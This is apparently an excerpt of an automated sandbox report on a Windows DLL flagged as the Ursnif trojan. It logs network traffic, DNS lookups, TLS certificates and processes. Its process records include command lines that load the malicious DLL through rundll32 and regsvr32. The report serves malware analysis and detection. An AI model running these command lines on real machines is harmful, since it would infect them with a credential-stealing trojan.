                                                                                                                                                                                                                                                                  Jun 3, 2021 17:49:59.935487032 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:49:59.935493946 CEST49745443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:49:59.935496092 CEST49744443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:49:59.935498953 CEST49745443192.168.2.6151.101.1.44

                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:55.088293076 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:55.137722969 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:56.360496044 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:56.414432049 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:56.695041895 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:56.743587017 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:57.821850061 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:57.870943069 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:59.060600042 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:47:59.102957964 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:00.602283955 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:00.651237965 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:01.772842884 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:01.813976049 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:02.633502007 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:02.682252884 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:03.761915922 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:03.810322046 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:06.340255022 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:06.392148018 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:11.932924032 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:11.984167099 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.309204102 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.352065086 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.786339998 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.803139925 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.853013039 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.854621887 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:14.881331921 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:14.949182987 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.457534075 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.508104086 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.598299980 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.657864094 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:19.148041964 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:19.208841085 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:23.333477020 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:23.394840002 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:24.743586063 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:24.796307087 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:28.305032969 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:28.354042053 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.603154898 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.652681112 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.697294950 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.747812033 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:37.652072906 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:37.693512917 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:38.745348930 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:38.794353962 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:39.795238018 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:39.831203938 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:39.844230890 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:39.879832029 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:40.865827084 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:40.916315079 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:41.911063910 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:41.957365990 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:41.961107969 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:41.998812914 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:44.020153046 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:44.061736107 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:46.025230885 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:46.073743105 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:48.134634972 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:48.183197021 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:49:42.413430929 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:49:42.475306988 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:50:10.646086931 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:50:10.687279940 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:50:11.196528912 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:50:11.261313915 CEST53518188.8.8.8192.168.2.6

                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.309204102 CEST192.168.2.68.8.8.80x1e4cStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:14.881331921 CEST192.168.2.68.8.8.80x26f2Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.457534075 CEST192.168.2.68.8.8.80xd292Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.598299980 CEST192.168.2.68.8.8.80xc1d9Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:19.148041964 CEST192.168.2.68.8.8.80xd321Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:23.333477020 CEST192.168.2.68.8.8.80x7770Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:24.743586063 CEST192.168.2.68.8.8.80xa87cStandard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:28.305032969 CEST192.168.2.68.8.8.80xdf51Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.603154898 CEST192.168.2.68.8.8.80x5aeStandard query (0)s.yimg.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.697294950 CEST192.168.2.68.8.8.80xb25fStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:12.352065086 CEST8.8.8.8192.168.2.60x1e4cNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:14.949182987 CEST8.8.8.8192.168.2.60x26f2No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.508104086 CEST8.8.8.8192.168.2.60xd292No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.508104086 CEST8.8.8.8192.168.2.60xd292No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.657864094 CEST8.8.8.8192.168.2.60xc1d9No error (0)contextual.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:19.208841085 CEST8.8.8.8192.168.2.60xd321No error (0)hblg.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:23.394840002 CEST8.8.8.8192.168.2.60x7770No error (0)lg3.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:24.796307087 CEST8.8.8.8192.168.2.60xa87cNo error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:28.354042053 CEST8.8.8.8192.168.2.60xdf51No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:28.354042053 CEST8.8.8.8192.168.2.60xdf51No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.652681112 CEST8.8.8.8192.168.2.60x5aeNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.652681112 CEST8.8.8.8192.168.2.60x5aeNo error (0)edge.gycpi.b.yahoodns.net87.248.118.23A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.652681112 CEST8.8.8.8192.168.2.60x5aeNo error (0)edge.gycpi.b.yahoodns.net87.248.118.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.747812033 CEST8.8.8.8192.168.2.60xb25fNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.747812033 CEST8.8.8.8192.168.2.60xb25fNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.747812033 CEST8.8.8.8192.168.2.60xb25fNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.747812033 CEST8.8.8.8192.168.2.60xb25fNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.747812033 CEST8.8.8.8192.168.2.60xb25fNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:50:10.687279940 CEST8.8.8.8192.168.2.60x725bNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607023001 CEST104.20.184.68443192.168.2.649730CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607940912 CEST104.20.184.68443192.168.2.649729CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751373053 CEST87.248.118.23443192.168.2.649741CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon May 03 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013Thu Jun 24 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751389980 CEST87.248.118.23443192.168.2.649742CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon May 03 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013Thu Jun 24 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.849334955 CEST151.101.1.44443192.168.2.649743CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850586891 CEST151.101.1.44443192.168.2.649744CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850776911 CEST151.101.1.44443192.168.2.649745CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:03
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\racial.dll'
                                                                                                                                                                                                                                                                  Imagebase:0x3e0000
                                                                                                                                                                                                                                                                  File size:116736 bytes
                                                                                                                                                                                                                                                                  MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:03
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                                                                                                                                                                                                                                                                  Imagebase:0x2a0000
                                                                                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:03
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                                                                                                                                                                                                                                                                  Imagebase:0x1330000
                                                                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:04
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                                                                                                                                                                                                                                                                  Imagebase:0xc60000
                                                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:04
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  Imagebase:0x7ff721e20000
                                                                                                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:06
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer
                                                                                                                                                                                                                                                                  Imagebase:0xc60000
                                                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Start time:17:48:06
                                                                                                                                                                                                                                                                  Start date:03/06/2021
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6624 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                                                  Imagebase:0xf90000
                                                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                  Disassembly

